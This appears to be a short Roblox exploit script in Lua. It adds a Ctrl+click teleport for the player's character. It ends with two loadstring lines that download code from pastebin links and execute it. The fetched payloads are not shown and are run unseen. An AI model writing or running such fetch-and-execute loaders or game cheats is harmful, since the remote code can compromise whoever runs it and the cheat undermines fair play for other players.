Message
Message
function GetCharacter()
return game.Players.LocalPlayer.Character
end
function Teleport(pos)
local Char = GetCharacter()
if Char then
Char:MoveTo(pos)
end
end
UIS.InputBegan:Connect(function(input)
if input.UserInputType == Enum.UserInputType.MouseButton1 and
UIS:IsKeyDown(Enum.KeyCode.LeftControl) then
Teleport(Mouse.Hit.p)
end
end)
loadstring(game:HttpGet("https://pastebin.com/raw/AbDM2er1"))()
pcall(loadstring(game:HttpGet("https://pastebin.com/raw/2wgbZ6Xd")))